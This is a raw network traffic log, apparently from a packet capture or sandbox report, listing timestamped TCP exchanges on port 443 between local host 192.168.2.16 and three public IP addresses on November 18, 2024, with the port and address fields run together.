                                                                                                                                          Nov 18, 2024 06:48:26.063003063 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.063076019 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.063086033 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.063182116 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.063853025 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.063872099 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.063914061 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.063921928 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.063978910 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.064677954 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.064698935 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.064723015 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.064723015 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.064733982 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.064765930 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.064790964 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.068238974 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.068263054 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.068344116 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.068356037 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.068417072 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.069084883 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.069103956 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.069158077 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.069166899 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.069183111 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.069216013 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.174943924 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.174967051 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.175040960 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.175060034 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.175117016 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.175709009 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.175725937 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.175791025 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.175800085 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.175852060 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.176388979 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.176405907 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.176474094 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.176481962 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.176542044 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.176984072 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.176999092 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.177061081 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.177068949 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.177134037 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.178096056 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.178113937 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.178173065 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.178183079 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.178227901 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.178745031 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.178764105 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.178818941 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.178826094 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.178843975 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.178880930 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.179555893 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.179573059 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.179634094 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.179641962 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.179707050 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.290391922 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.290412903 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.290525913 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.290543079 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.290594101 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.291043043 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.291058064 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.291136026 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.291146040 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.291196108 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.291557074 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.291579008 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.291640043 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.291649103 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.291702032 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.291971922 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.291987896 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.292047977 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.292057037 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.292105913 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.292691946 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.292709112 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.292766094 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.292773962 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.292824030 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.293203115 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.293216944 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.293282986 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.293291092 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.293338060 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.293664932 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.293679953 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.293732882 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.293740988 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.293766975 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.293788910 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.357652903 CET4435520918.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.357673883 CET4435520918.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.357681990 CET4435520918.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.357814074 CET55209443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:26.357825041 CET4435520918.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.358515024 CET55209443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:26.358578920 CET4435520918.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.358644962 CET55209443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:26.371232986 CET55211443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:26.371294022 CET4435521135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.371444941 CET55211443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:26.371824026 CET55211443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:26.371859074 CET4435521135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.376740932 CET55212443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:26.376764059 CET4435521218.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.376900911 CET55212443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:26.377033949 CET55212443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:26.377044916 CET4435521218.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.405917883 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.405940056 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.406040907 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.406061888 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.406126022 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.406398058 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.406414032 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.406486988 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.406505108 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.406564951 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.406936884 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.406955004 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.407021046 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.407033920 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.407088041 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.407390118 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.407407045 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.407480001 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.407494068 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.407551050 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.407888889 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.407903910 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.407979965 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.407994032 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.408070087 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.408493042 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.408510923 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.408570051 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.408584118 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.408613920 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.408667088 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.408973932 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.408993006 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.409060955 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.409074068 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.409157038 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.521018982 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.521048069 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.521234989 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.521276951 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.521451950 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.521641016 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.521656990 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.521785975 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.521800995 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.521866083 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.522442102 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.522475004 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.522542953 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.522557974 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.522594929 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.522620916 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.522958040 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.522974968 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.523046970 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.523061037 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.523143053 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.523403883 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.523427010 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.523480892 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.523494005 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.523521900 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.523542881 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.524434090 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.524450064 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.524514914 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.524529934 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.524590015 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.525150061 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.525167942 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.525243044 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.525258064 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.525333881 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.563676119 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.563709974 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.564011097 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.564079046 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.564182997 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.636939049 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.636967897 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.637197018 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.637265921 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.637335062 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.637622118 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.637641907 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.637717962 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.637736082 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.637795925 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.638478994 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.638495922 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.638560057 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.638575077 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.638628006 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.639224052 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.639249086 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.639312983 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.639328003 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.639393091 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.639393091 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.639781952 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.639802933 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.639873028 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.639888048 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.639940023 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.640301943 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.640326023 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.640393972 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.640407085 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.640465021 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.641243935 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.641263008 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.641330004 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.641343117 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.641359091 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.641396046 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.641444921 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.752151966 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.752172947 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.752417088 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.752485037 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.752564907 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.752818108 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.752840996 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.752903938 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.752922058 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.752954006 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.752976894 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.753681898 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.753701925 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.753786087 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.753807068 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.753869057 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.754148006 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.754172087 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.754236937 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.754251957 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.754301071 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.754792929 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.754817009 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.754884958 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.754899025 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.754966021 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.755572081 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.755588055 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.755664110 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.755676985 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.755745888 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.756004095 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.756030083 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.756098986 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.756124020 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.756140947 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.756165981 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.756201029 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.756258011 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.756269932 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.756325006 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.756587029 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.756614923 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.035684109 CET4435521135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.036108017 CET55211443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:27.036154985 CET4435521135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.036602020 CET4435521135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.037090063 CET55211443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:27.037170887 CET4435521135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.037256002 CET55211443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:27.079354048 CET4435521135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.207381964 CET4435521218.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.207669020 CET55212443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:27.207684040 CET4435521218.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.208729029 CET4435521218.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.208803892 CET55212443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:27.209085941 CET55212443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:27.209151030 CET4435521218.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.209228039 CET55212443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:27.209237099 CET4435521218.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.226582050 CET4435521135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.226602077 CET4435521135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.226667881 CET4435521135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.226686001 CET55211443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:27.226761103 CET55211443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:27.228271008 CET55211443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:27.228310108 CET4435521135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.231292009 CET55213443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:27.231331110 CET4435521352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.231451035 CET55213443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:27.231622934 CET55213443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:27.231631994 CET4435521352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.255191088 CET55212443192.168.2.1618.66.102.12
